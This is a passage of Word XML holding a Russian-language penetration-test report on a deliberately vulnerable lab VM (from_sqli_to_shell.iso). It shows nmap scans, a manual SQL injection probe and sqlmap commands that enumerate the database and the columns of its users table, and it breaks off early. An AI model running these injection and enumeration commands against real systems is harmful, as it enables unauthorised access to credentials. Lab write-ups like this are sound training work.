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7AD5B" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Отчёт о тестировании на проникновение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71114ABD" w14:textId="6F105F6F" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Объект:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> веб</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">приложение, развёрнутое на виртуальной машине из образа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>from_sqli_to_shell.iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6D37DC" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Методы и инструменты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274F5917" w14:textId="6D7C06E5" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> — сканирование сети и сервисов</w:t>
      </w:r>
      <w:r w:rsidR="006657E7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> — автоматизированный анализ и эксплуатация SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:noBreakHyphen/>
        <w:t>инъекций</w:t>
      </w:r>
      <w:r w:rsidR="006657E7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>ручной анализ HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:noBreakHyphen/>
        <w:t>запросов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D7B9D" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Развёрнут образ виртуальной машины </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from_sqli_to_shell.iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E1BFD" w14:textId="4F8E15CC" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Этап 1: сетевое сканирование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1464996C" w14:textId="18E70B4D" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> выявить активные хосты и открытые порты в подсети</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725E75E9" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Команды и результаты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FE0281" w14:textId="77777777" w:rsidR="006657E7" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:t>Обнаружение активных хостов в подсети</w:t>
      </w:r>
      <w:r w:rsidR="006657E7">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> 192.168.31.0/24 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="436BFD08" w14:textId="1A7581B7" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:t>обнаружен активный хост с IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:noBreakHyphen/>
        <w:t>адресом 192.168.31.173.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70CB25" w14:textId="38477765" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:r w:rsidRPr="009506E0">
        <w:t>Детальное сканирование целевого IP с определением версий сервисов</w:t>
      </w:r>
      <w:r w:rsidR="006657E7">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> 192.168.31.173 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AF57911" w14:textId="4B33498C" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Результат:</w:t>
      </w:r>
      <w:r w:rsidR="006657E7">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>порт 22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenSSH</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> 5.5</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debian</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663272EA" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:t>порт</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — HTTP (Apache httpd 2.2.16).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F7105" w14:textId="5964E3A2" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Этап 2: анализ веб</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>приложения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264FA9E1" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> проверить наличие уязвимостей в веб</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:noBreakHyphen/>
        <w:t>приложении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934E724" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Действия и результаты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D943814" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ручной тест на SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>инъекцию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38359A" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:t>Переход по URL: http://192.168.31.173/cat.php?id=1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05421B2E" w14:textId="46860E7C" w:rsidR="006657E7" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve">Модификация параметра: добавление символа </w:t>
      </w:r>
      <w:r w:rsidR="00544153" w:rsidRPr="00544153">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> в конец значения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:br/>
        <w:t>http://192.168.31.173/cat.php?id=1</w:t>
      </w:r>
      <w:r w:rsidR="006657E7" w:rsidRPr="006657E7">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9DB83" w14:textId="1E33756C" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="006657E7">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Результат:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> получена ошибка синтаксиса SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C7155E" w14:textId="61426A31" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="00544153" w:rsidP="009506E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidR="009506E0" w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">нализ с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009506E0" w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="090C3727" w14:textId="121B181E" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve">Проверка уязвимости параметра </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>://192.168.31.173/</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F81595B" w14:textId="37D3AB9F" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="00544153">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Результат</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>выявлены</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>типы</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>уязвимостей</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00544153" w:rsidRPr="00544153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>based blind</w:t>
      </w:r>
      <w:r w:rsidR="00544153" w:rsidRPr="00544153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidR="00544153" w:rsidRPr="00544153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>based blind</w:t>
      </w:r>
      <w:r w:rsidR="00544153" w:rsidRPr="00544153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46741F77" w14:textId="21F5F581" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:t>Получение списка таблиц БД</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>://192.168.31.173/</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>=1" --</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE7F537" w14:textId="73D8200A" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Результат:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> обнаружена таблица </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FCC2D95" w14:textId="2A11C90A" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve">Получение структуры таблицы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>://192.168.31.173/</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>=1" -</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0428D450" w14:textId="160ECDD6" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="00544153">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Результат</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>колонки</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00544153" w:rsidRPr="00544153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mediumint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00544153" w:rsidRPr="00544153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>login (varchar)</w:t>
      </w:r>
      <w:r w:rsidR="00544153" w:rsidRPr="00544153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password (varchar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264D704A" w14:textId="77777777" w:rsidR="00544153" w:rsidRDefault="00544153" w:rsidP="009506E0"/>
    <w:p w14:paraId="4E4E1282" w14:textId="77777777" w:rsidR="00544153" w:rsidRDefault="00544153" w:rsidP="009506E0"/>
    <w:p w14:paraId="1956F84E" w14:textId="16BEB83F" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
